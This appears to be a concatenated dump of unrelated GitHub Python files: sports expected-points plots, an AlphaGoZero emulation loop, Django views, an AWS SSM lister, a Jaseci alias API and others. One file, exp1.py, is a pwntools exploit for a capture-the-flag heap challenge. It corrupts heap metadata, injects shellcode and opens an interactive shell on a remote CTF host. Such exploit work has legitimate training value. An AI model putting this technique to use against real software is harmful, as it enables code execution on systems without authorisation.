break\n\n else:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n whole_cue.append(\"_\")\n count += 1\n\n df = write_into_df (a_sentence, each_word, whole_cue, df, filename)\n\n return df\n\n\n\n\ndef write_into_df (a_sentence, each_word, whole_cue, existing_np, filename):\n sentence = []\n event = []\n for each_word_obj in a_sentence.word_list:\n sentence.append(each_word_obj.word_mark)\n\n for each_word_obj in each_word.event_list:\n event.append(each_word_obj.word_mark)\n\n sentence_str = \" \".join(sentence)\n event_str = \" \".join(event)\n this_word_str = each_word.word_mark\n cue_str = \"\".join(whole_cue)\n\n new_np = np.array([[sentence_str,event_str,cue_str, this_word_str, filename]])\n results_np = np.vstack([existing_np,new_np])\n #existing_np.append([[sentence_str,event_str,cue_str, this_word_str]], axis = 0)\n #print(new_np)\n return results_np\n\n\n\n\nif __name__ == '__main__':\n#\"/home/nianheng/Desktop/problem/0/\"\n rootpath = '/home/nianheng/Documents/hiwi/10october/SWG/results_without_namefolder/'\n outpath = \"/home/nianheng/Documents/hiwi/11november/\"\n file_list = read_sentences(rootpath)\n\n df = np.array([['sentences', 'event', 'cues', 'outcomes(variant)', 'filename']])\n\n for each_file_name in file_list:\n file_path = rootpath + each_file_name\n try:\n file_textgrid_obj = textgrid.TextGrid.fromFile(file_path)\n a_sentence = Sentences()\n a_sentence.read_from_textgrid(file_textgrid_obj)\n create_event(a_sentence, each_file_name)\n df_np = create_cues(a_sentence,df, each_file_name)\n df = pd.DataFrame(df_np, columns=['sentences', 'event', 'cues', 'outcomes(variant)', 'filename'])\n except UnicodeDecodeError:\n print(each_file_name + ': the encode is weird, not utf-8 or ansi')\n df.to_csv(outpath + \"first_try.csv\", sep=\",\")","repo_name":"RealNicolasBourbaki/KEC","sub_path":"try_morpho_tagger/CreateNPLTrainingSet.py","file_name":"CreateNPLTrainingSet.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25481139757","text":"from agent import Agent\nfrom threading import Thread\nfrom utilities import TimeLogger, heatmap\nfrom time import time\n\n\n\nclass Emulation:\n\t\"\"\"Server for MDP emulation\"\"\"\n\tTIMER = TimeLogger()\n\tdef __init__(self, \n\t\t\t\t MDP_class, \n\t\t\t\t n_tree_nodes, \n\t\t\t\t n_sampling_moves, \n\t\t\t\t n_threads, \n\t\t\t\t n_moves, \n\t\t\t\t replay_buffer=None, \n\t\t\t\t temperatur=1, \n\t\t\t\t **kwargs):\n\t\tself.replay_buffer = replay_buffer\n\t\tself.MDP_class = MDP_class\n\t\tself.n_tree_nodes = n_tree_nodes\n\t\tself.n_sampling_moves = n_sampling_moves\n\t\tself.n_threads = n_threads\n\t\tself.n_moves = n_moves\n\t\tself.temperatur = temperatur\n\t\tself.Z_AVRG = 0\n\t\tself.Z = 0\n\t\tself.N = 0\n\t\tself.eta = 0.03\n\n\n\t@TIMER.log\n\tdef play(self, link, seed):\n\t\ttrajectory = []\n\t\tMDP = self.MDP_class()\n\t\tagent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t state=MDP.S, \n\t\t\t\t\t n_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t link=link, \n\t\t\t\t\t n_threads=self.n_threads, \n\t\t\t\t\t temperatur=self.temperatur, \n\t\t\t\t\t seed=seed + int(time()))\n\t\tVs, X = [], MDP.S.X\n\t\tfor t in range(self.n_moves):\n\t\t\tPI, A = agent(self.n_tree_nodes)\n\t\t\tVs.append(agent.mcts.root.V)\n\t\t\ttrajectory.append((X, PI))\n\t\t\tX, terminal = MDP(A)\n\t\t\tif terminal: break\n\t\tZ = MDP.evaluate()\n\t\ttrajectory = [(X, PI, Z*((-1)**i)) for i, (X, PI) in enumerate(trajectory[:-1])]\n\t\tX, PI, Z_end = trajectory[-1]\n\t\tV_end = Vs[-2]\n\t\tself.Z_AVRG = (1 - self.eta) * self.Z_AVRG + self.eta * Z\n\t\tprint(f\"\"\"{MDP.S}\nBLACK VICTORIES: {round(self.Z_AVRG, 3)}\nLEN OF THE GAME: {len(trajectory)}\n{'BLACKS' if Z == 1 else 'WHITES'} VICTORY\nEVALUATION ERROR: {round(Z_end + V_end, 2)}\"\"\")\n\t\tself.replay_buffer.extend(trajectory[:-3])\n\n\n\tdef eval(self, link, PID, score, phase='alpha'):\n\t\tflag = True\n\t\twhile True:\n\t\t\t# START GAME\n\t\t\tMDP = self.MDP_class()\n\t\t\talpha_agent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t\t\t\tstate=MDP.S, \n\t\t\t\t\t\t\t\tn_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t\t\t\tlink=link, \n\t\t\t\t\t\t\t\tn_threads=self.n_threads, \n\t\t\t\t\t\t\t\ttemperatur=self.temperatur,\n\t\t\t\t\t\t\t\tseed=(int(time()) + PID),\n\t\t\t\t\t\t\t\tverbose=(PID == 0))\n\t\t\t\n\t\t\tbeta_agent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t\t\t state=MDP.S, \n\t\t\t\t\t\t\t n_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t\t\t link=link, \n\t\t\t\t\t\t\t n_threads=self.n_threads, \n\t\t\t\t\t\t\t temperatur=self.temperatur, \n\t\t\t\t\t\t\t seed=(int(time()) - PID),\n\t\t\t\t\t\t\t randomize=False,\n\t\t\t\t\t\t\t verbose=(PID == 0))\n\t\t\t\n\t\t\talpha_pass = 0\n\t\t\tbeta_pass = 0\n\t\t\twhile True:\n\t\t\t\tPI, A = alpha_agent(self.n_tree_nodes)\n\t\t\t\tbeta_agent.mcts.forward(A)\n\t\t\t\tX, terminal = MDP(A)\n\t\t\t\tif A is None:\n\t\t\t\t\talpha_pass += 1\n\t\t\t\tif terminal: break\n\n\t\t\t\tPI, A = beta_agent(self.n_tree_nodes)\n\t\t\t\talpha_agent.mcts.forward(A)\n\t\t\t\tX, terminal = MDP(A)\n\t\t\t\tif A is None:\n\t\t\t\t\tbeta_pass += 1\n\t\t\t\tif terminal: break\n\n\t\t\t# CREATE TRAJECTORY\n\t\t\tprint(MDP.S, alpha_pass, beta_pass)\n\t\t\tZ = MDP.evaluate()\n\t\t\tif flag:\n\t\t\t\tscore.append(Z)\n\t\t\t\tflag = False\n\t\t\t\n\n\n\tdef run(self, *args, **kwargs):\n\t\targs = args\n\t\tkwargs = kwargs\n\t\twhile True:\n\t\t\tself.play(*args, **kwargs)\n\n","repo_name":"mortimervonchappuis/AlphaGoZero","sub_path":"emulation.py","file_name":"emulation.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"756324926","text":"#coding:utf-8\nimport sys\nfrom pwn import *\ncontext.log_level='debug'\ncontext.arch='amd64'\nwhile True :\n\t# try :\n\t\tif len(sys.argv)==1 :\n\t\t\tio=process('./mimic_heap')\n\t\t\t# io=process(['./'],env={'LD_PRELOAD':'./'})\n\t\t\telf=ELF('./mimic_heap')\n\t\t\tlibc1=ELF('./libc-2.27.so')\n\t\t\tlibc2=ELF('./libc-2.23.so')\n\t\t\t# libc2 = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\n\t\t\tone_gadget = [0x4f2c5,0x4f322,0x10a38c]\n\t\telse :\n\t\t\tio=remote('nc.eonew.cn',10009)\n\t\t\telf=ELF('./mimic_heap')\n\t\t\tlibc1=ELF('./libc-2.27.so')\n\t\t\tlibc2=ELF('./libc-2.23.so')\n\t\t\t# ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so')\n\t\t\tone_gadget = [0x4f2c5,0x4f322,0x10a38c]\n\n\t\tdef add(a,b):\n\t\t\tio.sendlineafter('Your choice:','1')\n\t\t\tio.sendlineafter('The size: ',str(a))\n\t\t\tio.sendafter('Content: ',b)\n\n\t\tdef edit(a,b):\n\t\t\tio.sendlineafter('Your choice:','3')\n\t\t\tio.sendlineafter('want to modify:',str(a))\n\t\t\tio.sendafter('Content: ',b)\n\n\t\tdef show(a):\n\t\t\tio.sendlineafter('Your choice:','4')\n\t\t\tio.sendlineafter('want to see: ',str(a))\n\n\t\tdef delete(a):\n\t\t\tio.sendlineafter('Your choice:','2')\n\t\t\tio.sendlineafter('u want to delete: ',str(a))\n\n\n\t\tadd(0xa0,'aaaa')\n\t\tdelete(0)\n\t\tadd(0x40,'aaaa')\n\t\tadd(0x40,'aaaa')\n\t\tadd(0x48,'aaaa')\n\t\tfor i in range(8):\n\t\t\tadd(0xf8,'aaaa')\n\t\tfor i in range (7):\n\t\t\tdelete(i+4)\n\n\t\tptr=0xabc028\n\t\tfd=ptr-0x18\n\t\tbk=ptr-0x10\n\t\tedit(2,p64(0)+p64(0x41)+p64(fd)+p64(bk)+'\\x00'*0x20+p64(0x40))\n\t\tadd(0x20,'aaaa')\n\t\tdelete(3)\n\t\tpay=[\n\t\t0x1000,0xabc000\n\t\t]\n\t\tedit(2,flat(pay))\n\t\tpay=[\n\t\t0,0x101,\n\t\t0,0,\n\t\t0x100,0xabc010,\n\t\t0x100,0xabc010,\n\t\t0x100,0xabc000\n\t\t]\n\t\tedit(1,flat(pay).ljust(0x100,'\\x00')+p64(0)+p64(0x21)+p64(0)+p64(0x21)+p64(0)+p64(0xab1)+asm(shellcraft.sh()))\n\t\tdelete(2)\n\t\tshell_addr=0xabc130\n\t\tedit(3,p64(0x100))\n\t\tedit(1,'\\x00'*0x10+p64(shell_addr)+'\\x00'*0x18+p64(shell_addr))\n\n\t\t# if heap_base&0xfff == 0 :\n\t\t# \tlibc=libc2\n\t\t# else:\n\t\t# \tlibc=libc1\n\t\t# pay=[\n\t\t# heap_base+0xc0\n\t\t# ]\n\t\t# edit(1,flat(pay)+'\\x90')\n\t\t# show(0)\n\t\t# io.recvuntil('Content: \\n')\n\t\t# libc_base=(u64(io.recv(6)+'\\x00\\x00')-libc.sym['__malloc_hook']-88-0x10)&0xffffffffffff000\n\t\t# libc.address=libc_base\n\t\t# bin_sh_addr=libc.search('/bin/sh\\x00').next()\n\t\t# system_addr=libc.sym['system']\n\t\t# pay=[\n\t\t# libc.sym['__free_hook'],\n\t\t# ]\n\t\t# edit(1,flat(pay)+'\\x90')\n\t\t# edit(0,p64(system_addr))\n\t\t# add(0x20,'/bin/sh\\x00')\n\t\t# delete(3)\n\n\n\n\t\t# success('heap_base:'+hex(heap_base))\n\t\t# success('libc_base:'+hex(libc_base))\n\t\t# gdb.attach(io)\n\t\t# pause()\n\t\tio.interactive()\n\n\t# except Exception as e:\n\t# \tio.close()\n\t# \tcontinue\n\t# else:\n\t# \tcontinue","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"pwn_challage/mimic_heap/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"1106377257","text":"'''Make a 3-d graph relating expected points to distance and first down'''\r\n\r\nimport numpy as n\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pickle\r\n\r\nmainModel = pickle.load(open(\"mainmodel.dat\",\"rb\"))\r\nnormalModel = pickle.load(open(\"normalmodel.dat\",\"rb\"))\r\nfourthModel = pickle.load(open(\"4thmodel.dat\",\"rb\"))\r\nKOModel = pickle.load(open(\"KOModel.dat\",\"rb\"))\r\nclutchModel = pickle.load(open(\"final5.dat\",\"rb\"))\r\ngtgModel = pickle.load(open(\"gtgmodel.dat\",\"rb\"))\r\ndecisionModel = pickle.load(open(\"4thChoiceModel.dat\",\"rb\"))\r\n\r\n#this function exists so that the main function can be on top where it belongs\r\ndef runThings():\r\n plotEP()\r\n #plotEP(down=n.random.randint(1,5),sd=n.random.randint(-17,18),time=n.random.randint(0,1801),half=2,scoreType=-7)\r\n #plotDecisions(time=900,sd=0)\r\n \r\n#wasn't expecting this to end up being recursive but it makes sense, \r\n#i guess, with teams kicking back and forth until time runs out\r\ndef EP(probArray, time, sd):\r\n MTTS = 261 #mean time to score, determined through averaging the time to next score of all events with a next score that half\r\n kickoffAdjustment = 0 if time <= 0 else EP(KOModel.predict_proba([[35, time - MTTS, sd]])[0], time - MTTS, sd)\r\n return ((probArray[6] - probArray[0]) * (6.97 - kickoffAdjustment) + #our TD prob minus their TD prob, multiplied by TD value (6.97 accounting for average conversion score)\r\n (probArray[5] - probArray[1]) * (3 - kickoffAdjustment) + #same but for FGs\r\n (probArray[4] - probArray[2]) * (2 + kickoffAdjustment)) #you receive the KO after a safety so add the KO adjustment\r\n \r\ndef GTGProbArray(down, dist, time, sd, underThree):\r\n output = list(gtgModel.predict_proba([[down, dist, time, sd, underThree]])[0])\r\n output.append(0)\r\n output[3:7] = output[2:6]\r\n mainModel.predict_proba([[down, dist, dist, time, sd, 1, underThree]])[0][2] #get safety against probs from main model\r\n output = n.array(output)\r\n output /= n.sum(output) #normalize so probs add up to 1.0\r\n return output\r\n\r\nscoreMap = {-7:(0, \"TD Against\"),-3:(1,\"FG Against\"),-2:(2,\"Safety Conceded\"),0:(3,\"Scoreless Rest of Half\"),+2:(4,\"Safety For\"),+3:(5,\"FG by offense\"),+7:(6,\"TD by offense\")}\r\ncolours = [\"viridis\", \"Wistia\",\"cool\",\"spring\",\"summer\",\"gnuplot\",\"plasma\"]\r\n \r\n#selects the correct model and returns the expected point value for a play with the given parameters, or a certain scoring probability\r\n#(does not include kickoff-type plays)\r\ndef EPFunc(down, toGoal, toFirst, time, sd, gtg, underThree, half=1, scoreType=\"EP\"):\r\n if (scoreType == \"EP\"):\r\n if ((half == 2) and (time <= 300)):\r\n return EP(clutchModel.predict_proba([[down, min(toFirst, toGoal), toGoal, time, sd, int(gtg), int(underThree)]])[0],time,sd) \r\n elif (gtg): \r\n output = GTGProbArray(down, toGoal, time, sd, underThree)\r\n return EP(output, time, sd)\r\n elif (down == 4):\r\n return EP(fourthModel.predict_proba([[toGoal, toFirst, time, int(toGoal <= 37), sd]])[0],time,sd) \r\n else: \r\n return EP(normalModel.predict_proba([[down,min(toFirst,toGoal),toGoal,time,sd,int(underThree)]])[0],time,sd)\r\n else: \r\n if (scoreType not in scoreMap):\r\n raise ValueError(\"Improper Score Type Provided\")\r\n if ((half == 2) and (time <= 300)):\r\n return clutchModel.predict_proba([[down, min(toFirst, toGoal), toGoal, time, sd, int(gtg), int(underThree)]])[0][scoreMap[scoreType][0]]\r\n elif (gtg): \r\n return GTGProbArray(down, toGoal, time, sd, underThree)[scoreMap[scoreType][0]]\r\n elif (down == 4):\r\n return fourthModel.predict_proba([[toGoal, toFirst, time, int(toGoal <= 37), sd]])[0][scoreMap[scoreType][0]]\r\n else: \r\n return normalModel.predict_proba([[down,min(toFirst,toGoal),toGoal,time,sd,int(underThree)]])[0][scoreMap[scoreType][0]]\r\n \r\n \r\ndef plotEP(down=1, sd=0, time=1200, half=1, scoreType=\"EP\"):\r\n z = n.zeros((100, 100)) # Initialize z with zeros. the first array axis is yardsToFirst, and the second is yardsToGoal\r\n x = n.linspace(1,100,num=100)\r\n y = n.linspace(1,25,num=100)\r\n x,y = n.meshgrid(x,y)\r\n for yardsToGoal in range(100):\r\n for yardsToFirst in range(100):\r\n index = yardsToFirst\r\n yardsToFirst = (yardsToFirst * (25/100) + 1)\r\n z[index][yardsToGoal] = EPFunc(down, yardsToGoal+1, min(yardsToFirst, yardsToGoal+1), time, sd, (yardsToFirst >= yardsToGoal), (time < 180),half,scoreType=scoreType)\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,z,cmap=colours[n.random.randint(len(colours))],rcount=100,ccount=100)\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Expected Points\",\r\n title=(\"EP by Field Position and Distance to First Down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in half \" + str(half) + \" on down #\" + str(down)),zlim=(-3,7),ylim=(0,25),xlim=(0,100))\r\n if (scoreType != \"EP\"):\r\n axes.set(zlabel=scoreMap[scoreType][1] + \"Probability\",\r\n title=\"Probability of \" + scoreMap[scoreType][1] + \", Possession Team \" + (\"winning\" if sd >= 0 else \"losing\") + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in half \" + str(half) + \" on down #\" + str(down))\r\n if (scoreType != \"EP\"):\r\n biggest = max(max(z[0]),max(z[99])) \r\n #highest peak on either extreme end of the graph. \r\n #while some points may technically be higher, this is good enough\r\n axes.set(zlim=(0,biggest * 1.2 if (biggest <= 0.5) else 1))\r\n plt.subplots_adjust(top=0.97,right=1,left=0.0,bottom=0.0)\r\n plt.show()\r\ndef plotDecisions(sd=0,time=1200):\r\n goForIt = n.zeros((100, 100)) #the first array axis is yardsToFirst, and the second is yardsToGoal\r\n kickFG = n.zeros((100,100))\r\n punt = n.zeros((100,100))\r\n x = n.linspace(1,100,num=100)\r\n y = n.linspace(1,25,num=100)\r\n x,y = n.meshgrid(x,y)\r\n for yardsToGoal in range(100):\r\n for yardsToFirst in range(100):\r\n index = yardsToFirst\r\n yardsToFirst = (yardsToFirst / 4)\r\n punt[index][yardsToGoal], kickFG[index,yardsToGoal],goForIt[index][yardsToGoal] = decisionModel.predict_proba([[yardsToGoal, min(yardsToFirst, yardsToGoal),time, int(yardsToGoal <= 40), sd]])[0]\r\n #sets the value of all three arrays in the same command\r\n \r\n #make goForIt graph \r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,goForIt,cmap=\"cool\",rcount=100,ccount=100,label=\"Go for it Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team Going for it on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\n \r\n #make field goal graph\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,kickFG,cmap=\"winter\",rcount=100,ccount=100,label=\"Field Goal Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team attempting a FG on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\n\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,punt,cmap=\"Wistia\",rcount=100,ccount=100,label=\"Punt Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team punting on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\nrunThings()","repo_name":"RougeGod/SportsModelling","sub_path":"Football/3DVisualizations.py","file_name":"3DVisualizations.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69924726298","text":"\"\"\"\nAlias api as a mixin\n\"\"\"\nfrom jaseci.extens.api.interface import Interface\n\n\nclass AliasAPI:\n \"\"\"\n Alias APIs for creating nicknames for UUIDs and other long strings\n\n The alias set of APIs provide a set of `alias' management functions for\n creating and managing aliases for long strings such as UUIDs. If an alias'\n name is used as a parameter value in any API call, that parameter will see\n the alias' value instead. Given that references to all sentinels, walkers,\n nodes, etc. utilize UUIDs, it becomes quite useful to create pneumonic\n names for them. Also, when registering sentinels, walkers, architype\n handy aliases are automatically generated. These generated aliases can\n then be managed using the alias APIs. Keep in mind that whenever an alias\n is created, all parameter values submitted to any API with the alias name\n will be replaced internally by its value. If you get in a bind, simply use\n the clear or delete alias APIs.\n \"\"\"\n\n def __init__(self):\n self.alias_map = {}\n\n @Interface.private_api(cli_args=[\"name\"])\n def alias_register(self, name: str, value: str):\n \"\"\"Create string to string alias mapping that caller can use.\n\n Either create new alias string to string mappings or replace\n an existing mappings of a given alias name. Once registered the\n alias mapping is instantly active.\n\n Args:\n name (str): The name for the alias created by caller.\n value (str): The value for that name to map to (i.e., UUID)\n\n Returns:\n json: Fields include\n 'response': Message of mapping that was created\n \"\"\"\n self.alias_map[name] = value\n self.save()\n return {\"response\": f\"Alias from '{name}' to '{value}' set!\"}\n\n @Interface.private_api()\n def alias_list(self):\n \"\"\"List all string to string alias that caller can use.\n\n Returns dictionary object of name to value mappings currently active.\n This API is quite useful to track not only the aliases the caller\n creates, but also the aliases automatically created as various Jaseci\n objects (walkers, architypes, sentinels, etc.) are created, changed,\n or destroyed.\n\n Returns:\n dictionary: Dictionary of active mappings\n 'name': 'value'\n ...\n \"\"\"\n return self.alias_map\n\n @Interface.private_api(cli_args=[\"name\"])\n def alias_delete(self, name: str):\n \"\"\"Delete an active string to string alias mapping.\n\n Removes a specific alias by its name. Only the alias is removed no\n actual objects are affected. Future uses of this name will not be\n mapped.\n\n Args:\n name (str): The name for the alias to be removed from caller.\n\n Returns:\n dictionary: Fields include\n 'response': Message of success/failure to remove alias\n 'success': True/False based on delete actually happening\n \"\"\"\n if name in self.alias_map.keys():\n del self.alias_map[name]\n self.save()\n return {\"response\": f\"Alias {name} successfully deleted\", \"success\": True}\n else:\n return {\"response\": f\"Alias {name} not present\", \"success\": False}\n\n @Interface.private_api()\n def alias_clear(self):\n \"\"\"Remove all string to string alias that client can use.\n\n Removes a all aliases. No actual objects are affected. Aliases will\n continue to be automatically generated when creating other Jaseci\n objects.\n\n Returns:\n dictionary: Fields include\n 'response': Message of number of alias removed\n 'removed': Number of aliases removed\n \"\"\"\n n = len(self.alias_map.keys())\n self.alias_map = {}\n self.save()\n return {\"response\": f\"All {n} aliases deleted\", \"removed\": n}\n\n def extract_snt_aliases(self, snt):\n \"\"\"\n Extract and register all aliases from sentinel\n \"\"\"\n self.alias_register(f\"sentinel:{snt.name}\", snt.jid)\n for i in snt.arch_ids.obj_list():\n self.extract_arch_aliases(snt, i)\n self.save()\n\n def extract_arch_aliases(self, snt, arch):\n \"\"\"\n Extract and register all aliases from architype\n \"\"\"\n if arch.kind == \"walker\":\n self.alias_register(f\"{snt.name}:walker:{arch.name}\", arch.jid)\n else:\n self.alias_register(f\"{snt.name}:architype:{arch.name}\", arch.jid)\n\n def remove_snt_aliases(self, snt):\n \"\"\"\n Extract and register all aliases from sentinel\n \"\"\"\n self.alias_delete(f\"sentinel:{snt.name}\")\n for i in snt.arch_ids.obj_list():\n self.remove_arch_aliases(snt, i)\n self.save()\n\n def remove_arch_aliases(self, snt, arch):\n \"\"\"\n Extract and register all aliases from architype\n \"\"\"\n if arch.kind == \"walker\":\n self.alias_delete(f\"{snt.name}:walker:{arch.name}\")\n else:\n self.alias_delete(f\"{snt.name}:architype:{arch.name}\")\n","repo_name":"Jaseci-Labs/jaseci","sub_path":"jaseci_core/jaseci/extens/api/alias_api.py","file_name":"alias_api.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"68"} +{"seq_id":"15823098190","text":"import boto3\r\nimport json\r\n\r\nimport botocore\r\n# import operator\r\nregions=['af-south-1', 'eu-north-1', 'ap-south-1', 'eu-west-3', 'eu-west-2', 'eu-south-1', 'eu-west-1', 'ap-northeast-3', 'ap-northeast-2', 'me-south-1', 'ap-northeast-1', 'sa-east-1', 'ca-central-1', 'ap-east-1', 'ap-southeast-1', 'ap-southeast-2', 'eu-central-1', 'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2']\r\nfor j in regions:\r\n try:\r\n print(\"Here are all the ssm sessions from \"+ j +\" region\")\r\n print(\"..................................................................................................\")\r\n\r\n\r\n ssm_client = boto3.client('ssm', region_name = j )\r\n list_ssm = []\r\n next_token = None\r\n while True:\r\n response2 = ssm_client.describe_sessions(State='Active',\r\n NextToken= next_token\r\n ) if next_token else ssm_client.describe_sessions(State='Active')\r\n print(response2['Sessions']) \r\n for l in response2['Sessions']:\r\n \r\n \r\n status_var2 = l['Status']\r\n \r\n rank = 0\r\n if status_var2 == \"Connected\":\r\n rank = 1\r\n if status_var2 == \"Failed\":\r\n rank = 2\r\n\r\n list_ssm.append((l['SessionId'], \"Sessions\" , \"No Document name\",l['Status'], rank))\r\n \r\n\r\n\r\n print(list_ssm)\r\n \r\n if 'NextToken' in response2.keys():\r\n next_token = response2['NextToken']\r\n \r\n else:\r\n break\r\n\r\n except Exception as e:\r\n print ( \"Exception occured \")\r\n print(e)\r\n continue\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"saima-noor/my_projects","sub_path":"SSM resources/describe_ssm_sessions.py","file_name":"describe_ssm_sessions.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69903101018","text":"from django.shortcuts import render, redirect\n# from django.contrib.auth.forms import UserCreationForm\nfrom .forms import UserRegisterForm, ProfileImageForm, UserUpdateForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\n\ndef register(request):\n error = ''\n if request.method == \"POST\":\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Пользовать {username} был успешно создан!')\n return redirect('home')\n else:\n error = \"Форма заполнена неправильно\"\n\n form = UserRegisterForm()\n\n data = {\n 'title':'Страница регистрации',\n 'form': form,\n \"error\": error,\n }\n\n return render(request, 'users/registration.html', data)\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n profileForm = ProfileImageForm(request.POST, request.FILES, instance=request.user.profile)\n updateUserForm = UserUpdateForm(request.POST, instance=request.user)\n \n if profileForm.is_valid() and updateUserForm.is_valid():\n updateUserForm.save()\n profileForm.save()\n messages.success(request, f'Профиль был успешно обновлен!')\n return redirect('profile')\n else:\n profileForm = ProfileImageForm(instance=request.user.profile)\n updateUserForm = UserUpdateForm(instance=request.user)\n\n data = {\n 'profileForm': profileForm,\n 'updateUserForm': updateUserForm\n }\n\n return render(request, 'users/profile.html', data)\n\n\n# Create your views here.\n","repo_name":"pesnyuspoyom/facetook","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8196622822","text":"from pathlib import Path\n\nwith open(\"RNU6_269P.txt\", \"r\") as f:\n header = next(f)\n f.close()\n\nprint(header)\n\nfilename = \"RNU6_269P.txt\"\nfile = Path(filename)\ndata = file.read_text()\n\nline = data.split('\\n')\n\nprint(line[0])","repo_name":"Carol-mza/2019-2020-PNE-Practices","sub_path":"Session 04/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6148314129","text":"TIC = 'btc'\r\n\r\nTURBULENCE_FACTOR = 1.2\r\nTIMESTEPS = 10000 # ~ 500 timesteps per second | 3600 seconds in an hour\r\nPPI = 137.68\r\n\r\nCOLOUR_LIST = [ \r\n \"lightcoral\",\r\n \"lightskyblue\",\r\n \"lightskyblue\",\r\n \"sandybrown\",\r\n \"limegreen\",\r\n \"deepskyblue\",\r\n \"plum\",\r\n \"turquoise\",\r\n \"crimson\",\r\n \"mediumpurple\",\r\n \"hotpink\"\r\n]\r\n\r\nSINGLE_TI = [\"macd\", \"rsi_30\", \"cci_30\", \"dx_30\", \"adx\", \"obv\"]\r\nPASS_LIST = [\"boll_ub\", \"boll_lb\", \"close_30_sma\"]\r\n\r\nMODEL_LIST = [\"a2c\", \"ppo\"] # [\"ddpg\", \"td3\", \"sac\"]\r\n\r\nSTART_DATE = \"2014-06-01\"\r\nEND_DATE = \"2020-05-30\"\r\n\r\nSTART_TRADE_DATE = \"2019-06-01\"\r\n\r\n# Stockstats list\r\nTECHNICAL_INDICATORS_LIST = [\r\n \"macd\",\r\n \"boll_ub\",\r\n \"boll_lb\",\r\n \"rsi_30\",\r\n \"cci_30\",\r\n \"dx_30\",\r\n \"close_30_sma\",\r\n \"close_60_sma\",\r\n \"adx\",\r\n]\r\n\r\n# My TI list\r\nTI_LIST = [\r\n \"macd\",\r\n \"boll_ub\",\r\n \"boll_lb\",\r\n \"rsi_30\",\r\n \"cci_30\",\r\n \"dx_30\",\r\n \"close_30_sma\",\r\n \"close_60_sma\",\r\n \"adx\",\r\n \"psar\",\r\n \"obv\"\r\n]","repo_name":"jeremyruss/Reinforcement-Learning-for-Algorithmic-Trading","sub_path":"finrl/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15524231184","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas import ExcelFile\nfrom OneHotEncoder import OneHotEncoder\n\nimport torch\nimport torch.nn as nn\n\nclass 